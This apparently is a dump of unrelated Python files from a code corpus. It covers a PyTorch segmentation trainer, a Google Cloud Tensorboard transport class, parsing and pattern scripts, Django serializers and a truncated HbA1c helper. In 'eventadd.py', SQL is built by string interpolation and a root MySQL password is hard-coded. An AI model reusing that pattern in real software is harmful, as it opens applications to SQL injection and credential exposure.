of an epoch\n if (i + 1) % (print_every + 1) == 0:\n print(\"Epoch {}, {:d}% \\t train_loss: {:.2f} took: {:.2f}s\".format(\n epoch+1, int(100 * (i+1) / n_batches), running_loss / print_every, time.time() - start_time))\n print(\"Epoch {}, {:d}% \\t train_loss: {:.2f} took: {:.2f}s\".format(\n epoch+1, int(100 * (i+1) / n_batches), running_loss_dis / print_every, time.time() - start_time))\n print('data max', output_seg[0,0].mean(),output_seg[0,1].mean())\n\n\n \n #Reset running loss and time\n running_loss = 0.0\n running_loss_dis = 0.0\n start_time = time.time()\n \n print('Number of well prediction', G/(G+F))\n #At the end of the epoch, do a pass on the validation set\n #test()\n total_val_loss = 0\n total_val_loss_dis = 0\n \n for data in val_loader:\n \n if self.gpu_mode:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float).cuda() ,torch.as_tensor(data[1]['segment'], dtype=torch.float).cuda()\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float).cuda()\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float).cuda()\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n else:\n input_seg, label_seg = torch.tensor(data[1]['image'], dtype=torch.float) ,torch.tensor(data[1]['segment'], dtype=torch.float)\n input_adv = torch.tensor(data[0]['image'], dtype=torch.float)\n label_adv = torch.tensor(data[0]['source'], dtype=torch.float)\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n \n #Forward pass\n \n val_output_seg = seg(input_seg)[0]\n #output_dis = adv(seg(input_adv)[1])\n \n \n #loss_discriminator = loss_dis(output_dis,label_adv)\n loss_segmenter = loss_seg(val_output_seg,label_seg)\n\n \n total_val_loss += loss_segmenter.item()\n #total_val_loss_dis += loss_discriminator.item()\n \n print(\"Validation loss segmenter = {:.2f}\".format(total_val_loss / len(val_loader)))\n print(\"Validation loss discriminator= {:.2f}\".format(total_val_loss_dis / len(val_loader)))\n\n \n print(\"Training finished, took {:.2f}s\".format(time.time() - training_start_time))\n \n \n def test(self,):\n pred = self.seg.cuda()(torch.tensor(a['image'].reshape(1,3,self.input_dim,self.input_dim),dtype=torch.float).cuda())[0]\n imshow(pred.cpu().detach().numpy().reshape(2,self.input_dim-18,self.input_dim-18)[1])\n pred2 = self.seg.cuda()(torch.tensor(b['image'].reshape(1,3,self.input_dim,self.input_dim),dtype=torch.float).cuda())[0]\n imshow(pred2.cpu().detach().numpy().reshape(2,self.input_dim-18,self.input_dim-18)[1])\n \n def save(self,PATH_seg,PATH_adv):\n torch.save(self.seg.state_dict(), PATH_seg)\n torch.save(self.adv.state_dict(),PATH_adv)\n \n def load(self,PATH_seg,PATH_adv):\n \n self.seg.load_state_dict(torch.load(PATH_seg))\n self.seg.eval()\n \n self.adv.load_state_dict(torch.load(PATH_adv))\n self.adv.eval()\n \n def get_DSC_on_T(self):\n total_loss = 0\n dataloader = torch.utils.data.DataLoader(Tar,\n batch_size = 1,\n shuffle = True,\n num_workers = 0)\n for data in dataloader:\n input_seg, label_seg = torch.as_tensor(data['image'], dtype=torch.float).cuda() ,torch.as_tensor(data['segment'], dtype=torch.float).cuda()\n output = self.seg(input_seg)[0]\n loss = DSC(output,label_seg)\n total_loss += loss.item()\n \n return(total_loss/len(dataloader))\n\n\ninput_dim =150\n\ndef DSC(logits,labels):\n eps=10e-5\n pred = logits.view(2,1,input_dim-18,input_dim-18)\n labels 
=labels.view(2,1,input_dim-18,input_dim-18)\n precision = torch.sum(pred[1]*labels[1])/torch.sum(pred[1])\n \n recall = torch.sum(pred[1]*labels[1])/torch.sum(labels[1])\n \n return -2*(precision*recall)/(precision+recall+eps)\n \n\n\n","sub_path":"pyTsegmenter.py","file_name":"pyTsegmenter.py","file_ext":"py","file_size_in_byte":17083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"68060153","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport abc\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Union\n\nfrom google.cloud.aiplatform_v1 import gapic_version as package_version\n\nimport google.auth # type: ignore\nimport google.api_core\nfrom google.api_core import exceptions as core_exceptions\nfrom google.api_core import gapic_v1\nfrom google.api_core import retry as retries\nfrom google.api_core import operations_v1\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\nfrom google.cloud.aiplatform_v1.types import tensorboard\nfrom google.cloud.aiplatform_v1.types import tensorboard_experiment\nfrom google.cloud.aiplatform_v1.types import (\n tensorboard_experiment as gca_tensorboard_experiment,\n)\nfrom google.cloud.aiplatform_v1.types import tensorboard_run\nfrom google.cloud.aiplatform_v1.types import tensorboard_run as gca_tensorboard_run\nfrom google.cloud.aiplatform_v1.types import tensorboard_service\nfrom google.cloud.aiplatform_v1.types import tensorboard_time_series\nfrom google.cloud.aiplatform_v1.types import (\n tensorboard_time_series as gca_tensorboard_time_series,\n)\nfrom google.cloud.location import locations_pb2 # type: ignore\nfrom google.iam.v1 import iam_policy_pb2 # type: ignore\nfrom google.iam.v1 import policy_pb2 # type: ignore\nfrom google.longrunning import operations_pb2\nfrom google.longrunning import operations_pb2 # type: ignore\n\nDEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n gapic_version=package_version.__version__\n)\n\n\nclass TensorboardServiceTransport(abc.ABC):\n \"\"\"Abstract transport class for TensorboardService.\"\"\"\n\n AUTH_SCOPES = (\n \"https://www.googleapis.com/auth/cloud-platform\",\n \"https://www.googleapis.com/auth/cloud-platform.read-only\",\n )\n\n DEFAULT_HOST: str = \"aiplatform.googleapis.com\"\n\n def __init__(\n self,\n *,\n host: str = DEFAULT_HOST,\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n quota_project_id: Optional[str] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n always_use_jwt_access: Optional[bool] = False,\n api_audience: Optional[str] = None,\n **kwargs,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]):\n The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials 
to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is mutually exclusive with credentials.\n scopes (Optional[Sequence[str]]): A list of scopes.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n always_use_jwt_access (Optional[bool]): Whether self signed JWT should\n be used for service account credentials.\n \"\"\"\n\n scopes_kwargs = {\"scopes\": scopes, \"default_scopes\": self.AUTH_SCOPES}\n\n # Save the scopes.\n self._scopes = scopes\n\n # If no credentials are provided, then determine the appropriate\n # defaults.\n if credentials and credentials_file:\n raise core_exceptions.DuplicateCredentialArgs(\n \"'credentials_file' and 'credentials' are mutually exclusive\"\n )\n\n if credentials_file is not None:\n credentials, _ = google.auth.load_credentials_from_file(\n credentials_file, **scopes_kwargs, quota_project_id=quota_project_id\n )\n elif credentials is None:\n credentials, _ = google.auth.default(\n **scopes_kwargs, quota_project_id=quota_project_id\n )\n # Don't apply audience if the credentials file passed from user.\n if hasattr(credentials, \"with_gdch_audience\"):\n credentials = credentials.with_gdch_audience(\n api_audience if api_audience else host\n )\n\n # If the credentials are service account credentials, then always try to use self signed JWT.\n if (\n always_use_jwt_access\n and isinstance(credentials, service_account.Credentials)\n and hasattr(service_account.Credentials, \"with_always_use_jwt_access\")\n ):\n credentials = credentials.with_always_use_jwt_access(True)\n\n # Save the credentials.\n self._credentials = credentials\n\n # Save the hostname. 
Default to port 443 (HTTPS) if none is specified.\n if \":\" not in host:\n host += \":443\"\n self._host = host\n\n def _prep_wrapped_messages(self, client_info):\n # Precompute the wrapped methods.\n self._wrapped_methods = {\n self.create_tensorboard: gapic_v1.method.wrap_method(\n self.create_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard: gapic_v1.method.wrap_method(\n self.get_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard: gapic_v1.method.wrap_method(\n self.update_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboards: gapic_v1.method.wrap_method(\n self.list_tensorboards,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard: gapic_v1.method.wrap_method(\n self.delete_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_usage: gapic_v1.method.wrap_method(\n self.read_tensorboard_usage,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_size: gapic_v1.method.wrap_method(\n self.read_tensorboard_size,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.create_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.get_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.update_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboard_experiments: gapic_v1.method.wrap_method(\n self.list_tensorboard_experiments,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.delete_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_run: gapic_v1.method.wrap_method(\n self.create_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_create_tensorboard_runs: gapic_v1.method.wrap_method(\n self.batch_create_tensorboard_runs,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_run: gapic_v1.method.wrap_method(\n self.get_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_run: gapic_v1.method.wrap_method(\n self.update_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboard_runs: gapic_v1.method.wrap_method(\n self.list_tensorboard_runs,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_run: gapic_v1.method.wrap_method(\n self.delete_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_create_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.batch_create_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.create_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.get_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.update_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n 
self.list_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.list_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.delete_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_read_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.batch_read_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.read_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_blob_data: gapic_v1.method.wrap_method(\n self.read_tensorboard_blob_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.write_tensorboard_experiment_data: gapic_v1.method.wrap_method(\n self.write_tensorboard_experiment_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.write_tensorboard_run_data: gapic_v1.method.wrap_method(\n self.write_tensorboard_run_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.export_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.export_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n }\n\n def close(self):\n \"\"\"Closes resources associated with the transport.\n\n .. warning::\n Only call this method if the transport is NOT shared\n with other clients - this may cause errors in other clients!\n \"\"\"\n raise NotImplementedError()\n\n @property\n def operations_client(self):\n \"\"\"Return the client designed to process long-running operations.\"\"\"\n raise NotImplementedError()\n\n @property\n def create_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardRequest],\n Union[tensorboard.Tensorboard, Awaitable[tensorboard.Tensorboard]],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboards(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardsRequest],\n Union[\n tensorboard_service.ListTensorboardsResponse,\n Awaitable[tensorboard_service.ListTensorboardsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_usage(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardUsageRequest],\n Union[\n tensorboard_service.ReadTensorboardUsageResponse,\n Awaitable[tensorboard_service.ReadTensorboardUsageResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_size(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardSizeRequest],\n Union[\n tensorboard_service.ReadTensorboardSizeResponse,\n Awaitable[tensorboard_service.ReadTensorboardSizeResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_experiment(\n self,\n ) -> Callable[\n 
[tensorboard_service.CreateTensorboardExperimentRequest],\n Union[\n gca_tensorboard_experiment.TensorboardExperiment,\n Awaitable[gca_tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardExperimentRequest],\n Union[\n tensorboard_experiment.TensorboardExperiment,\n Awaitable[tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardExperimentRequest],\n Union[\n gca_tensorboard_experiment.TensorboardExperiment,\n Awaitable[gca_tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_experiments(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardExperimentsRequest],\n Union[\n tensorboard_service.ListTensorboardExperimentsResponse,\n Awaitable[tensorboard_service.ListTensorboardExperimentsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardExperimentRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardRunRequest],\n Union[\n gca_tensorboard_run.TensorboardRun,\n Awaitable[gca_tensorboard_run.TensorboardRun],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_create_tensorboard_runs(\n self,\n ) -> Callable[\n [tensorboard_service.BatchCreateTensorboardRunsRequest],\n Union[\n tensorboard_service.BatchCreateTensorboardRunsResponse,\n Awaitable[tensorboard_service.BatchCreateTensorboardRunsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardRunRequest],\n Union[\n tensorboard_run.TensorboardRun, Awaitable[tensorboard_run.TensorboardRun]\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardRunRequest],\n Union[\n gca_tensorboard_run.TensorboardRun,\n Awaitable[gca_tensorboard_run.TensorboardRun],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_runs(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardRunsRequest],\n Union[\n tensorboard_service.ListTensorboardRunsResponse,\n Awaitable[tensorboard_service.ListTensorboardRunsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardRunRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_create_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.BatchCreateTensorboardTimeSeriesRequest],\n Union[\n tensorboard_service.BatchCreateTensorboardTimeSeriesResponse,\n Awaitable[tensorboard_service.BatchCreateTensorboardTimeSeriesResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardTimeSeriesRequest],\n Union[\n gca_tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[gca_tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n 
raise NotImplementedError()\n\n @property\n def get_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardTimeSeriesRequest],\n Union[\n tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardTimeSeriesRequest],\n Union[\n gca_tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[gca_tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardTimeSeriesRequest],\n Union[\n tensorboard_service.ListTensorboardTimeSeriesResponse,\n Awaitable[tensorboard_service.ListTensorboardTimeSeriesResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardTimeSeriesRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_read_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.ReadTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.ReadTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_blob_data(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardBlobDataRequest],\n Union[\n tensorboard_service.ReadTensorboardBlobDataResponse,\n Awaitable[tensorboard_service.ReadTensorboardBlobDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def write_tensorboard_experiment_data(\n self,\n ) -> Callable[\n [tensorboard_service.WriteTensorboardExperimentDataRequest],\n Union[\n tensorboard_service.WriteTensorboardExperimentDataResponse,\n Awaitable[tensorboard_service.WriteTensorboardExperimentDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def write_tensorboard_run_data(\n self,\n ) -> Callable[\n [tensorboard_service.WriteTensorboardRunDataRequest],\n Union[\n tensorboard_service.WriteTensorboardRunDataResponse,\n Awaitable[tensorboard_service.WriteTensorboardRunDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def export_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.ExportTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.ExportTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.ExportTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_operations(\n self,\n ) -> Callable[\n [operations_pb2.ListOperationsRequest],\n Union[\n operations_pb2.ListOperationsResponse,\n Awaitable[operations_pb2.ListOperationsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_operation(\n self,\n ) -> Callable[\n [operations_pb2.GetOperationRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n 
@property\n def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None,]:\n raise NotImplementedError()\n\n @property\n def delete_operation(\n self,\n ) -> Callable[[operations_pb2.DeleteOperationRequest], None,]:\n raise NotImplementedError()\n\n @property\n def wait_operation(\n self,\n ) -> Callable[\n [operations_pb2.WaitOperationRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def set_iam_policy(\n self,\n ) -> Callable[\n [iam_policy_pb2.SetIamPolicyRequest],\n Union[policy_pb2.Policy, Awaitable[policy_pb2.Policy]],\n ]:\n raise NotImplementedError()\n\n @property\n def get_iam_policy(\n self,\n ) -> Callable[\n [iam_policy_pb2.GetIamPolicyRequest],\n Union[policy_pb2.Policy, Awaitable[policy_pb2.Policy]],\n ]:\n raise NotImplementedError()\n\n @property\n def test_iam_permissions(\n self,\n ) -> Callable[\n [iam_policy_pb2.TestIamPermissionsRequest],\n Union[\n iam_policy_pb2.TestIamPermissionsResponse,\n Awaitable[iam_policy_pb2.TestIamPermissionsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_location(\n self,\n ) -> Callable[\n [locations_pb2.GetLocationRequest],\n Union[locations_pb2.Location, Awaitable[locations_pb2.Location]],\n ]:\n raise NotImplementedError()\n\n @property\n def list_locations(\n self,\n ) -> Callable[\n [locations_pb2.ListLocationsRequest],\n Union[\n locations_pb2.ListLocationsResponse,\n Awaitable[locations_pb2.ListLocationsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def kind(self) -> str:\n raise NotImplementedError()\n\n\n__all__ = (\"TensorboardServiceTransport\",)\n","sub_path":"google/cloud/aiplatform_v1/services/tensorboard_service/transports/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":25585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520323643","text":"import os, sys, glob, traceback\n\nimport parse_one\n\nfrom tools.common import open_json\n\nverbose = \"--quiet\" not in sys.argv\n\nAPI_DIRECTORY = sys.argv[1]\n\nalready_done = {}\nfor jsondos in glob.glob(os.path.join(API_DIRECTORY, '*/viz/procedure.json')):\n dos = open_json(jsondos)\n if dos.get('url_jo'):\n already_done[dos.get('url_dossier_senat')] = True\n\nfor url in sys.stdin:\n url = url.strip()\n if url in already_done:\n if verbose:\n print()\n print('======')\n print(url)\n print(' + passed, already done:', url)\n continue\n try:\n parse_one.process(API_DIRECTORY, url)\n except KeyboardInterrupt:\n break\n except Exception as e:\n traceback.print_exc()\n","sub_path":"parse_many.py","file_name":"parse_many.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"241326462","text":"import speech\nimport MySQLdb\nimport detector\ndef retname(name):\n\ttry:\n\t\treturn{'your':'my','you':'my','yours':'mine'}[name]\n\texcept:\n\t\tif name==\"my\":\n\t\t\tlst=detector.detectothers()\n\t\t\tprint(lst)\n\t\t\tif len(lst)>1:\n\t\t\t\tspeech.say(\"many people are there\")\n\t\t\t\tspeech.say(\"Whose is it?\")\n\t\t\t\tname=speech.input(\"\")\n\t\t\telse:\n\t\t\t\tname=lst[0]\n\t\t\treturn name\n\t\telse:\n\t\t\treturn name\ndef addevent(year,month,day,event_type,name):\n\tdb = MySQLdb.connect(host=\"localhost\",\n\t\t\t\t\t\tuser=\"root\",\n\t\t\t\t\t\tpasswd=\"6461\",\n\t\t\t\t\t\tdb=\"mine\")\n\tcur = 
db.cursor()\n\tname=retname(name)\n\tprint(year,month,day)\n\tcur.execute(\"INSERT INTO `event_manager`(`year`, `month`, `day`, `event_type`, `name`) VALUES (%d,%d,%d,'%s','%s')\"%(int(year),int(month),int(day),event_type,name))\n\tdb.close()\n\tspeech.say(\"Alright. Noted.\")","sub_path":"eventadd.py","file_name":"eventadd.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"217350023","text":"def for_two():\r\n for row in range(5):\r\n for col in range(4):\r\n if (row==4 or row+col==4) or (row==0 and col!=0) or (row==1 and col<1):\r\n print(\"*\",end=\" \")\r\n else:\r\n print(end=\" \")\r\n print()\r\n\r\ndef while_two():\r\n row=0\r\n while row<5:\r\n col=0\r\n while col<4:\r\n if (row==4 or row+col==4) or (row==0 and col!=0) or (row==1 and col<1):\r\n print(\"*\",end=\" \")\r\n else:\r\n print(end=\" \")\r\n col+=1\r\n row+=1\r\n print()\r\n","sub_path":"Num/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"468241328","text":"from rest_framework.serializers import (\n HyperlinkedIdentityField,\n ModelSerializer,\n SerializerMethodField,\n HyperlinkedRelatedField,\n )\nfrom elements.models import Element\nfrom groups.models import ALLOWED_EXTENSIONS\nfrom django.core.exceptions import ValidationError\n\n\nelement_detail_url = HyperlinkedIdentityField(\n view_name='element-detail',\n )\n\n\nclass ElementListSerializer(ModelSerializer):\n url = element_detail_url\n class Meta:\n model = Element\n fields = [\n 'url',\n 'name',\n 'description',\n ]\n\n\nclass ElementDetailSerializer(ModelSerializer):\n url = element_detail_url\n parent_group = HyperlinkedRelatedField(view_name='group-detail', read_only=True)\n class Meta:\n model = Element\n fields = [\n 'url',\n 'icon',\n 'name',\n 'description',\n 'creation_date',\n 'moderated',\n 'parent_group',\n ]\n\n\nclass ElementCreateSerializer(ModelSerializer):\n class Meta:\n model = Element\n fields = [\n 'name',\n 'parent_group',\n 'description',\n 'creation_date',\n 'icon',\n 'height_field',\n 'width_field',\n ]\n \n def validate(self, attrs):\n extension = attrs['icon'].name.split('.')[1]\n if extension not in ALLOWED_EXTENSIONS:\n raise ValidationError('This extension is not allowed')\n return attrs\n","sub_path":"elements/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"138980391","text":"\n\n# about HbA1c test: https://medlineplus.gov/lab-tests/hemoglobin-a1c-hba1c-test/\n\n# examples \ndata = [{'A1C_INDEX': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 6.0,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX_DOES_NOT_EXIST': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 7.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 10.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n ]\nnum_quarters = 8\nassert num_quarters >= len(data), 'Error: num_quarters must be greater or equal to length of \\'data\\' array'\n\nimport numpy as np\nA1C_INDEX = 'A1C_INDEX'\ndef target_a1c(data):\n out = np.zeros(num_quarters, dtype = int)\n for i, x in enumerate(data): # i is the index of list 
